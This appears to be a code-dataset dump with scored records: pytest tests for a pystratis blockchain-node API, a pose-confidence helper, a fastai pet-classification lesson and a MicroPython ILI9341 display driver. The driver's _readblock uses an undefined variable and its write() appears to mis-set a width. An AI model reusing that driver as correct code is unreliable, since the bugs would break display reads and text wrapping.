response = node.get_txout(trxid=generate_uint256, vout=0, include_mempool=False)
assert response == GetTxOutModel(**data)
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_get_txout_proof(mocker: MockerFixture, network, generate_uint256, generate_hexstring):
data = generate_hexstring(128)
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.get_txout_proof(
txids=[
generate_uint256,
generate_uint256
],
block_hash=generate_uint256
)
assert response == data
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_shutdown(mocker: MockerFixture, network):
data = None
mocker.patch.object(Node, 'post', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
node.shutdown()
# noinspection PyUnresolvedReferences
node.post.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_stop(mocker: MockerFixture, network):
data = None
mocker.patch.object(Node, 'post', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
node.stop()
# noinspection PyUnresolvedReferences
node.post.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_log_levels(mocker: MockerFixture, network):
data = None
mocker.patch.object(Node, 'put', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
node.log_levels(log_rules=[LogRule(rule_name='TestRule', log_level='Debug', filename='filename')])
# noinspection PyUnresolvedReferences
node.put.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_log_rules(mocker: MockerFixture, network):
data = [
{
'ruleName': 'TestRule',
'logLevel': 'Debug',
'filename': 'filename'
}
]
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.log_rules()
assert response == [LogRule(**x) for x in data]
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_async_loops(mocker: MockerFixture, network):
data = [
{
'loopName': 'Loop1',
'status': 'Running'
}
]
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.async_loops()
assert response == [AsyncLoopsModel(**x) for x in data]
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_rewind(mocker: MockerFixture, network):
data = "Rewind flag set, please restart the node."
mocker.patch.object(Node, 'put', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.rewind(height=2)
assert isinstance(response, str)
# noinspection PyUnresolvedReferences
node.put.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_delete_datafolder_chain(mocker: MockerFixture, network):
data = None
mocker.patch.object(Node, 'delete', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
node.delete_datafolder_chain()
# noinspection PyUnresolvedReferences
node.delete.assert_called_once()
| import pytest
import ast
from pytest_mock import MockerFixture
from pystratis.api.node import Node
from pystratis.api.node.responsemodels import *
from pystratis.api import FullNodeState, FeatureInitializationState, LogRule
from pystratis.core.networks import StraxMain, CirrusMain
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_status_no_publish(mocker: MockerFixture, network):
data = {
'agent': 'nodeagent',
'version': 'nodeversion',
'externalAddress': '[::0.0.0.0]',
'network': network.name,
'coin_ticker': 'STRAX' if 'Strax' in network.name else 'CRS',
'processId': '0',
'consensusHeight': 10,
'blockStoreHeight': 10,
'bestPeerHeight': 10,
'inboundPeers': [
{
'version': 1,
'remoteSocketEndpoint': '[::0.0.0.0]',
'tipHeight': 10
}
],
'outboundPeers': [
{
'version': 1,
'remoteSocketEndpoint': '[::0.0.0.0]',
'tipHeight': 10
}
],
'featuresData': [
{
'namespace': 'node.feature',
'state': FeatureInitializationState.Initialized
}
],
'dataDirectoryPath': '/my/data/dir',
'runningTime': 'a long time',
'difficulty': 100000.0000,
'protocolVersion': 123,
'testnet': False,
'relayFee': 0,
'state': FullNodeState.Initialized,
'inIbd': False,
'headerHeight': 1
}
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.status(publish=False)
assert response == StatusModel(**data)
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_status_publish(mocker: MockerFixture, network):
data = {
'agent': 'nodeagent',
'version': 'nodeversion',
'externalAddress': '[::0.0.0.0]',
'network': network.name,
'coin_ticker': 'STRAX' if 'Strax' in network.name else 'CRS',
'processId': '0',
'consensusHeight': 10,
'blockStoreHeight': 10,
'bestPeerHeight': 10,
'inboundPeers': [
{
'version': 1,
'remoteSocketEndpoint': '[::0.0.0.0]',
'tipHeight': 10
}
],
'outboundPeers': [
{
'version': 1,
'remoteSocketEndpoint': '[::0.0.0.0]',
'tipHeight': 10
}
],
'featuresData': [
{
'namespace': 'node.feature',
'state': FeatureInitializationState.Initialized
}
],
'dataDirectoryPath': '/my/data/dir',
'runningTime': 'a long time',
'difficulty': 100000.0000,
'protocolVersion': 123,
'testnet': False,
'relayFee': 0,
'state': FullNodeState.Initialized,
'inIbd': False,
'headerHeight': 1
}
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.status(publish=True)
assert response == StatusModel(**data)
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_get_blockheader(mocker: MockerFixture, network, generate_uint256):
data = {
'version': 1,
'merkleroot': generate_uint256,
'nonce': 0,
'bits': 'bits',
'previousblockhash': generate_uint256,
'time': 1,
}
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.get_blockheader(
block_hash=generate_uint256,
is_json_format=True
)
assert response == BlockHeaderModel(**data)
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_get_raw_transaction_verbose(mocker: MockerFixture, network, generate_coinbase_transaction, generate_uint256):
trxid = generate_uint256
data = generate_coinbase_transaction(trxid)
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.get_raw_transaction(trxid=trxid, verbose=True)
assert response == TransactionModel(**data)
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_get_raw_transaction_nonverbose(mocker: MockerFixture, network, generate_coinbase_transaction, generate_uint256):
trxid = generate_uint256
data = generate_coinbase_transaction(trxid)
hexified_data = bytes(str(data), 'ascii').hex()
mocker.patch.object(Node, 'get', return_value=hexified_data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.get_raw_transaction(trxid=trxid, verbose=False)
assert response == hexified_data
unserialized_response = ast.literal_eval(bytes.fromhex(hexified_data).decode('ascii'))
assert data == unserialized_response
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_decode_raw_transaction(mocker: MockerFixture, network, generate_uint256, generate_coinbase_transaction):
trxid = generate_uint256
data = generate_coinbase_transaction(trxid)
hexified_data = bytes(str(data), 'ascii').hex()
mocker.patch.object(Node, 'post', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.decode_raw_transaction(raw_hex=hexified_data)
assert response == TransactionModel(**data)
# noinspection PyUnresolvedReferences
node.post.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_validate_address(mocker: MockerFixture, network, generate_p2pkh_address):
address = generate_p2pkh_address(network=network)
data = {
'isvalid': True,
'address': address,
'scriptPubKey': 'a scriptPubKey',
'isscript': False,
'iswitness': False
}
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.validate_address(address=address)
assert response == ValidateAddressModel(**data)
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_get_txout(mocker: MockerFixture, network, generate_uint256, generate_hexstring, generate_p2pkh_address):
data = {
'bestblock': generate_uint256,
'confirmations': 1,
'value': 5,
'scriptPubKey': {
'asm': generate_hexstring(128),
'hex': generate_hexstring(128),
'type': 'pubkey',
'reqSigs': 1,
"addresses": [
generate_p2pkh_address(network=network)
]
},
'coinbase': False
}
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.get_txout(trxid=generate_uint256, vout=0, include_mempool=False)
assert response == GetTxOutModel(**data)
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_get_txout_proof(mocker: MockerFixture, network, generate_uint256, generate_hexstring):
data = generate_hexstring(128)
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.get_txout_proof(
txids=[
generate_uint256,
generate_uint256
],
block_hash=generate_uint256
)
assert response == data
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_shutdown(mocker: MockerFixture, network):
data = None
mocker.patch.object(Node, 'post', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
node.shutdown()
# noinspection PyUnresolvedReferences
node.post.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_stop(mocker: MockerFixture, network):
data = None
mocker.patch.object(Node, 'post', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
node.stop()
# noinspection PyUnresolvedReferences
node.post.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_log_levels(mocker: MockerFixture, network):
data = None
mocker.patch.object(Node, 'put', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
node.log_levels(log_rules=[LogRule(rule_name='TestRule', log_level='Debug', filename='filename')])
# noinspection PyUnresolvedReferences
node.put.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_log_rules(mocker: MockerFixture, network):
data = [
{
'ruleName': 'TestRule',
'logLevel': 'Debug',
'filename': 'filename'
}
]
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.log_rules()
assert response == [LogRule(**x) for x in data]
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_async_loops(mocker: MockerFixture, network):
data = [
{
'loopName': 'Loop1',
'status': 'Running'
}
]
mocker.patch.object(Node, 'get', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.async_loops()
assert response == [AsyncLoopsModel(**x) for x in data]
# noinspection PyUnresolvedReferences
node.get.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_rewind(mocker: MockerFixture, network):
data = "Rewind flag set, please restart the node."
mocker.patch.object(Node, 'put', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
response = node.rewind(height=2)
assert isinstance(response, str)
# noinspection PyUnresolvedReferences
node.put.assert_called_once()
@pytest.mark.parametrize('network', [StraxMain(), CirrusMain()], ids=['StraxMain', 'CirrusMain'])
def test_delete_datafolder_chain(mocker: MockerFixture, network):
data = None
mocker.patch.object(Node, 'delete', return_value=data)
node = Node(network=network, baseuri=mocker.MagicMock())
node.delete_datafolder_chain()
# noinspection PyUnresolvedReferences
node.delete.assert_called_once()
| it | 0.331387 | 1.936756 | 2 |
imapper/pose/confidence.py | amonszpart/iMapper | 18 | 13567 | import numpy as np
def get_conf_thresholded(conf, thresh_log_conf, dtype_np):
"""Normalizes a confidence score to (0..1).
Args:
conf (float):
Unnormalized confidence.
dtype_np (type):
Desired return type.
Returns:
confidence (np.float32):
Normalized joint confidence.
"""
# 1. / (1. + np.exp(-5000. * conf + 5))
# https://www.desmos.com/calculator/olqbvoffua
# + 9.5: 0.0019 => 0.5
# + 5 : 0.0010 => 0.5
# + 6.5: 0.0013 => 0.5
return np.where(
conf < dtype_np(0.),
dtype_np(0.),
dtype_np(1.) /
(dtype_np(1.) + np.exp(dtype_np(-5000.) * conf + dtype_np(9.5)))
).astype(dtype_np)
def get_confs(query_2d_full, frame_id, thresh_log_conf, mx_conf, dtype_np):
"""
Args:
query_2d_full (stealth.logic.skeleton.Skeleton):
Skeleton with confidences.
frame_id (int):
Frame id.
Returns:
confs (List[float]):
Confidences at frame_id.
"""
confs = np.zeros(query_2d_full.poses.shape[-1],
dtype=dtype_np)
is_normalized = query_2d_full.is_confidence_normalized()
if query_2d_full.has_confidence(frame_id):
for joint, conf in query_2d_full.confidence[frame_id].items():
cnf = dtype_np(conf) \
if is_normalized \
else get_conf_thresholded(conf, thresh_log_conf, dtype_np)
if mx_conf is not None and mx_conf < cnf:
mx_conf = dtype_np(cnf)
confs[joint] = dtype_np(cnf)
if mx_conf is None:
return confs
else:
assert isinstance(mx_conf, dtype_np)
return confs, mx_conf
| import numpy as np
def get_conf_thresholded(conf, thresh_log_conf, dtype_np):
"""Normalizes a confidence score to (0..1).
Args:
conf (float):
Unnormalized confidence.
dtype_np (type):
Desired return type.
Returns:
confidence (np.float32):
Normalized joint confidence.
"""
# 1. / (1. + np.exp(-5000. * conf + 5))
# https://www.desmos.com/calculator/olqbvoffua
# + 9.5: 0.0019 => 0.5
# + 5 : 0.0010 => 0.5
# + 6.5: 0.0013 => 0.5
return np.where(
conf < dtype_np(0.),
dtype_np(0.),
dtype_np(1.) /
(dtype_np(1.) + np.exp(dtype_np(-5000.) * conf + dtype_np(9.5)))
).astype(dtype_np)
def get_confs(query_2d_full, frame_id, thresh_log_conf, mx_conf, dtype_np):
"""
Args:
query_2d_full (stealth.logic.skeleton.Skeleton):
Skeleton with confidences.
frame_id (int):
Frame id.
Returns:
confs (List[float]):
Confidences at frame_id.
"""
confs = np.zeros(query_2d_full.poses.shape[-1],
dtype=dtype_np)
is_normalized = query_2d_full.is_confidence_normalized()
if query_2d_full.has_confidence(frame_id):
for joint, conf in query_2d_full.confidence[frame_id].items():
cnf = dtype_np(conf) \
if is_normalized \
else get_conf_thresholded(conf, thresh_log_conf, dtype_np)
if mx_conf is not None and mx_conf < cnf:
mx_conf = dtype_np(cnf)
confs[joint] = dtype_np(cnf)
if mx_conf is None:
return confs
else:
assert isinstance(mx_conf, dtype_np)
return confs, mx_conf
| fr | 0.111582 | 2.65575 | 3 |
notes/lessons/lesson_1/dog_breed.py | jpenna/course-v3 | 0 | 13568 | from fastai.vision import *
from fastai.metrics import error_rate
# First model using pet images
###########################
####### Get dataset #######
###########################
# Batch size
bs = 64
# help(untar_data)
# print(URLs.PETS)
# URLs.PETS = https://s3.amazonaws.com/fast-ai-imageclas/oxford-iiit-pet
# Downloads the images from a URL and untar it. Retruns a `path` object
path = untar_data(URLs.PETS)
path.ls() # List content in path
path_anno = path/'annotations'
path_img = path/'images'
fnames = get_image_files(path_img) # Get image files in path
# fnames[:5]
np.random.seed(2)
pattern = r'/([^/]+)_\d+.jpg$'
# ImageDataBunch: all the data you need to create a model
# How to get the labels? Check models.md#Labels for a few examples
data = ImageDataBunch.from_name_re(
path_img,
fnames,
pattern,
ds_tfms=get_transforms(), # Transform images: crop, resize, padding
size=224,
bs=bs
)
# Same name length, sizes, pixel values...
data.normalize(imagenet_stats)
data.show_batch(rows=3, figsize=(7,6))
# Check number of classes/labels
print(data.classes) # Print labels
len(data.classes) # Print count
print(data.c) # Print count
###########################
######## Training #########
###########################
# Create the training object
learn = cnn_learner(data, models.resnet34, metrics=error_rate)
# Training model
learn.model
# Trains
learn.fit_one_cycle(4)
# Save result
learn.save('stage-1')
###########################
######## Results ##########
###########################
interp = ClassificationInterpretation.from_learner(learn)
losses, idxs = interp.top_losses()
len(data.valid_ds) == len(losses) == len(idxs)
# Print top losses
interp.plot_top_losses(9, figsize=(15,11))
doc(interp.plot_top_losses)
# Print confusion matrix
interp.plot_confusion_matrix(figsize=(12,12), dpi=60)
# Show list of most confused categories
interp.most_confused(min_val=2)
###########################
######## 2nd Round ########
###########################
# Unfreeze to train more
learn.unfreeze()
learn.fit_one_cycle(1)
learn.load('stage-1')
# Prepare chart
learn.lr_find()
# Plot chart
learn.recorder.plot()
learn.unfreeze()
learn.fit_one_cycle(2, max_lr=slice(1e-6,1e-4))
###########################
###### Change model #######
###########################
# Bigger images + smaller batch size
data = ImageDataBunch.from_name_re(path_img, fnames, pattern, ds_tfms=get_transforms(),
size=299, bs=bs//2).normalize(imagenet_stats)
# Use resnet50
learn = cnn_learner(data, models.resnet50, metrics=error_rate)
# Plot
learn.lr_find()
learn.recorder.plot()
learn.fit_one_cycle(8)
learn.save('stage-1-50')
# Fine-tune
learn.unfreeze()
learn.fit_one_cycle(3, max_lr=slice(1e-6,1e-4))
# Use previous model if fine-tune did not help
learn.load('stage-1-50')
###########################
# Interpret results again #
###########################
interp = ClassificationInterpretation.from_learner(learn)
interp.most_confused(min_val=2)
| from fastai.vision import *
from fastai.metrics import error_rate
# First model using pet images
###########################
####### Get dataset #######
###########################
# Batch size
bs = 64
# help(untar_data)
# print(URLs.PETS)
# URLs.PETS = https://s3.amazonaws.com/fast-ai-imageclas/oxford-iiit-pet
# Downloads the images from a URL and untar it. Retruns a `path` object
path = untar_data(URLs.PETS)
path.ls() # List content in path
path_anno = path/'annotations'
path_img = path/'images'
fnames = get_image_files(path_img) # Get image files in path
# fnames[:5]
np.random.seed(2)
pattern = r'/([^/]+)_\d+.jpg$'
# ImageDataBunch: all the data you need to create a model
# How to get the labels? Check models.md#Labels for a few examples
data = ImageDataBunch.from_name_re(
path_img,
fnames,
pattern,
ds_tfms=get_transforms(), # Transform images: crop, resize, padding
size=224,
bs=bs
)
# Same name length, sizes, pixel values...
data.normalize(imagenet_stats)
data.show_batch(rows=3, figsize=(7,6))
# Check number of classes/labels
print(data.classes) # Print labels
len(data.classes) # Print count
print(data.c) # Print count
###########################
######## Training #########
###########################
# Create the training object
learn = cnn_learner(data, models.resnet34, metrics=error_rate)
# Training model
learn.model
# Trains
learn.fit_one_cycle(4)
# Save result
learn.save('stage-1')
###########################
######## Results ##########
###########################
interp = ClassificationInterpretation.from_learner(learn)
losses, idxs = interp.top_losses()
len(data.valid_ds) == len(losses) == len(idxs)
# Print top losses
interp.plot_top_losses(9, figsize=(15,11))
doc(interp.plot_top_losses)
# Print confusion matrix
interp.plot_confusion_matrix(figsize=(12,12), dpi=60)
# Show list of most confused categories
interp.most_confused(min_val=2)
###########################
######## 2nd Round ########
###########################
# Unfreeze to train more
learn.unfreeze()
learn.fit_one_cycle(1)
learn.load('stage-1')
# Prepare chart
learn.lr_find()
# Plot chart
learn.recorder.plot()
learn.unfreeze()
learn.fit_one_cycle(2, max_lr=slice(1e-6,1e-4))
###########################
###### Change model #######
###########################
# Bigger images + smaller batch size
data = ImageDataBunch.from_name_re(path_img, fnames, pattern, ds_tfms=get_transforms(),
size=299, bs=bs//2).normalize(imagenet_stats)
# Use resnet50
learn = cnn_learner(data, models.resnet50, metrics=error_rate)
# Plot
learn.lr_find()
learn.recorder.plot()
learn.fit_one_cycle(8)
learn.save('stage-1-50')
# Fine-tune
learn.unfreeze()
learn.fit_one_cycle(3, max_lr=slice(1e-6,1e-4))
# Use previous model if fine-tune did not help
learn.load('stage-1-50')
###########################
# Interpret results again #
###########################
interp = ClassificationInterpretation.from_learner(learn)
interp.most_confused(min_val=2)
| it | 0.285799 | 2.491752 | 2 |
Day 1/Demos/ili934xnew.py | thingslu/IoT-Bootcamp | 0 | 13569 | """
Copyright (c) 2017 <NAME>
https://github.com/jeffmer/micropython-ili9341
Jan 6, 2018
MIT License
https://github.com/jeffmer/micropython-ili9341/blob/master/LICENSE
"""
# This is an adapted version of the ILI934X driver as below.
# It works with multiple fonts and also works with the esp32 H/W SPI implementation
# Also includes a word wrap print function
# Proportional fonts are generated by Peter Hinch's Font-to-py
# MIT License; Copyright (c) 2017 <NAME>
# This file is part of MicroPython ILI934X driver
# Copyright (c) 2016 - 2017 <NAME>, <NAME>
#
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license.php
#
# Project home:
# https://github.com/tuupola/micropython-ili934x
import time
import ustruct
import tt32
import framebuf
from micropython import const
_RDDSDR = const(0x0f) # Read Display Self-Diagnostic Result
_SLPOUT = const(0x11) # Sleep Out
_GAMSET = const(0x26) # Gamma Set
_DISPOFF = const(0x28) # Display Off
_DISPON = const(0x29) # Display On
_CASET = const(0x2a) # Column Address Set
_PASET = const(0x2b) # Page Address Set
_RAMWR = const(0x2c) # Memory Write
_RAMRD = const(0x2e) # Memory Read
_MADCTL = const(0x36) # Memory Access Control
_VSCRSADD = const(0x37) # Vertical Scrolling Start Address
_PIXSET = const(0x3a) # Pixel Format Set
_PWCTRLA = const(0xcb) # Power Control A
_PWCRTLB = const(0xcf) # Power Control B
_DTCTRLA = const(0xe8) # Driver Timing Control A
_DTCTRLB = const(0xea) # Driver Timing Control B
_PWRONCTRL = const(0xed) # Power on Sequence Control
_PRCTRL = const(0xf7) # Pump Ratio Control
_PWCTRL1 = const(0xc0) # Power Control 1
_PWCTRL2 = const(0xc1) # Power Control 2
_VMCTRL1 = const(0xc5) # VCOM Control 1
_VMCTRL2 = const(0xc7) # VCOM Control 2
_FRMCTR1 = const(0xb1) # Frame Rate Control 1
_DISCTRL = const(0xb6) # Display Function Control
_ENA3G = const(0xf2) # Enable 3G
_PGAMCTRL = const(0xe0) # Positive Gamma Control
_NGAMCTRL = const(0xe1) # Negative Gamma Control
_CHUNK = const(1024) #maximum number of pixels per spi write
def color565(r, g, b):
return (r & 0xf8) << 8 | (g & 0xfc) << 3 | b >> 3
class ILI9341:
width = 320
height = 240
def __init__(self, spi, cs, dc, rst):
self.spi = spi
self.cs = cs
self.dc = dc
self.rst = rst
self.cs.init(self.cs.OUT, value=1)
self.dc.init(self.dc.OUT, value=0)
self.rst.init(self.rst.OUT, value=0)
self.reset()
self.init()
self._scroll = 0
self._buf = bytearray(_CHUNK * 2)
self._colormap = bytearray(b'\x00\x00\xFF\xFF') #default white foregraound, black background
self._x = 0
self._y = 0
self._font = tt32
self.scrolling = False
def set_color(self,fg,bg):
self._colormap[0] = bg>>8
self._colormap[1] = bg & 255
self._colormap[2] = fg>>8
self._colormap[3] = fg & 255
def set_pos(self,x,y):
self._x = x
self._y = y
def reset_scroll(self):
self.scrolling = False
self._scroll = 0
self.scroll(0)
def set_font(self, font):
self._font = font
def init(self):
for command, data in (
(_RDDSDR, b"\x03\x80\x02"),
(_PWCRTLB, b"\x00\xc1\x30"),
(_PWRONCTRL, b"\x64\x03\x12\x81"),
(_DTCTRLA, b"\x85\x00\x78"),
(_PWCTRLA, b"\x39\x2c\x00\x34\x02"),
(_PRCTRL, b"\x20"),
(_DTCTRLB, b"\x00\x00"),
(_PWCTRL1, b"\x23"),
(_PWCTRL2, b"\x10"),
(_VMCTRL1, b"\x3e\x28"),
(_VMCTRL2, b"\x86"),
#(_MADCTL, b"\x48"),
(_MADCTL, b"\x08"),
(_PIXSET, b"\x55"),
(_FRMCTR1, b"\x00\x18"),
(_DISCTRL, b"\x08\x82\x27"),
(_ENA3G, b"\x00"),
(_GAMSET, b"\x01"),
(_PGAMCTRL, b"\x0f\x31\x2b\x0c\x0e\x08\x4e\xf1\x37\x07\x10\x03\x0e\x09\x00"),
(_NGAMCTRL, b"\x00\x0e\x14\x03\x11\x07\x31\xc1\x48\x08\x0f\x0c\x31\x36\x0f")):
self._write(command, data)
self._write(_SLPOUT)
time.sleep_ms(120)
self._write(_DISPON)
def reset(self):
self.rst(0)
time.sleep_ms(50)
self.rst(1)
time.sleep_ms(50)
def _write(self, command, data=None):
self.dc(0)
self.cs(0)
self.spi.write(bytearray([command]))
self.cs(1)
if data is not None:
self._data(data)
def _data(self, data):
self.dc(1)
self.cs(0)
self.spi.write(data)
self.cs(1)
def _writeblock(self, x0, y0, x1, y1, data=None):
self._write(_CASET, ustruct.pack(">HH", x0, x1))
self._write(_PASET, ustruct.pack(">HH", y0, y1))
self._write(_RAMWR, data)
def _readblock(self, x0, y0, x1, y1):
self._write(_CASET, ustruct.pack(">HH", x0, x1))
self._write(_PASET, ustruct.pack(">HH", y0, y1))
if data is None:
return self._read(_RAMRD, (x1 - x0 + 1) * (y1 - y0 + 1) * 3)
def _read(self, command, count):
self.dc(0)
self.cs(0)
self.spi.write(bytearray([command]))
data = self.spi.read(count)
self.cs(1)
return data
def pixel(self, x, y, color=None):
if color is None:
r, b, g = self._readblock(x, y, x, y)
return color565(r, g, b)
if not 0 <= x < self.width or not 0 <= y < self.height:
return
self._writeblock(x, y, x, y, ustruct.pack(">H", color))
def fill_rectangle(self, x, y, w, h, color=None):
x = min(self.width - 1, max(0, x))
y = min(self.height - 1, max(0, y))
w = min(self.width - x, max(1, w))
h = min(self.height - y, max(1, h))
if color:
color = ustruct.pack(">H", color)
else:
color = self._colormap[0:2] #background
for i in range(_CHUNK):
self._buf[2*i]=color[0]; self._buf[2*i+1]=color[1]
chunks, rest = divmod(w * h, _CHUNK)
self._writeblock(x, y, x + w - 1, y + h - 1, None)
if chunks:
for count in range(chunks):
self._data(self._buf)
if rest != 0:
mv = memoryview(self._buf)
self._data(mv[:rest*2])
def erase(self):
self.fill_rectangle(0, 0, self.width, self.height)
def blit(self, bitbuff, x, y, w, h):
x = min(self.width - 1, max(0, x))
y = min(self.height - 1, max(0, y))
w = min(self.width - x, max(1, w))
h = min(self.height - y, max(1, h))
chunks, rest = divmod(w * h, _CHUNK)
self._writeblock(x, y, x + w - 1, y + h - 1, None)
written = 0
for iy in range(h):
for ix in range(w):
index = ix+iy*w - written
if index >=_CHUNK:
self._data(self._buf)
written += _CHUNK
index -= _CHUNK
c = bitbuff.pixel(ix,iy)
self._buf[index*2] = self._colormap[c*2]
self._buf[index*2+1] = self._colormap[c*2+1]
rest = w*h - written
if rest != 0:
mv = memoryview(self._buf)
self._data(mv[:rest*2])
def chars(self, str, x, y):
str_w = self._font.get_width(str)
div, rem = divmod(self._font.height(),8)
nbytes = div+1 if rem else div
buf = bytearray(str_w * nbytes)
pos = 0
for ch in str:
glyph, char_w = self._font.get_ch(ch)
for row in range(nbytes):
index = row*str_w + pos
for i in range(char_w):
buf[index+i] = glyph[nbytes*i+row]
pos += char_w
fb = framebuf.FrameBuffer(buf,str_w, self._font.height(), framebuf.MONO_VLSB)
self.blit(fb,x,y,str_w,self._font.height())
return x+str_w
def scroll(self, dy):
self._scroll = (self._scroll + dy) % self.height
self._write(_VSCRSADD, ustruct.pack(">H", self._scroll))
def next_line(self, cury, char_h):
global scrolling
if not self.scrolling:
res = cury + char_h
self.scrolling = (res >= self.height)
if self.scrolling:
self.scroll(char_h)
res = (self.height - char_h + self._scroll)%self.height
self.fill_rectangle(0, res, self.width, self._font.height())
return res
def write(self, text): #does character wrap, compatible with stream output
curx = self._x; cury = self._y
char_h = self._font.height()
width = 0
written = 0
for pos, ch in enumerate(text):
if ch == '\n':
if pos>0:
self.chars(text[written:pos],curx,cury)
curx = 0; written = pos+1; width = 0
cury = self.next_line(cury,char_h)
else:
char_w = self._font.get_width(ch)
if curx + width + char_w >= self.width:
self.chars(text[written:pos], curx,cury)
curx = 0 ; written = pos; width = char_h
cury = self.next_line(cury,char_h)
else:
width += char_w
if written<len(text):
curx = self.chars(text[written:], curx,cury)
self._x = curx; self._y = cury
def print(self, text): #does word wrap, leaves self._x unchanged
cury = self._y; curx = self._x
char_h = self._font.height()
char_w = self._font.max_width()
lines = text.split('\n')
for line in lines:
words = line.split(' ')
for word in words:
if curx + self._font.get_width(word) >= self.width:
curx = self._x; cury = self.next_line(cury,char_h)
while self._font.get_width(word) > self.width:
self.chars(word[:self.width//char_w],curx,cury)
word = word[self.width//char_w:]
cury = self.next_line(cury,char_h)
if len(word)>0:
curx = self.chars(word+' ', curx,cury)
curx = self._x; cury = self.next_line(cury,char_h)
self._y = cury | """
Copyright (c) 2017 <NAME>
https://github.com/jeffmer/micropython-ili9341
Jan 6, 2018
MIT License
https://github.com/jeffmer/micropython-ili9341/blob/master/LICENSE
"""
# This is an adapted version of the ILI934X driver as below.
# It works with multiple fonts and also works with the esp32 H/W SPI implementation
# Also includes a word wrap print function
# Proportional fonts are generated by Peter Hinch's Font-to-py
# MIT License; Copyright (c) 2017 <NAME>
# This file is part of MicroPython ILI934X driver
# Copyright (c) 2016 - 2017 <NAME>, <NAME>
#
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license.php
#
# Project home:
# https://github.com/tuupola/micropython-ili934x
import time
import ustruct
import tt32
import framebuf
from micropython import const
_RDDSDR = const(0x0f) # Read Display Self-Diagnostic Result
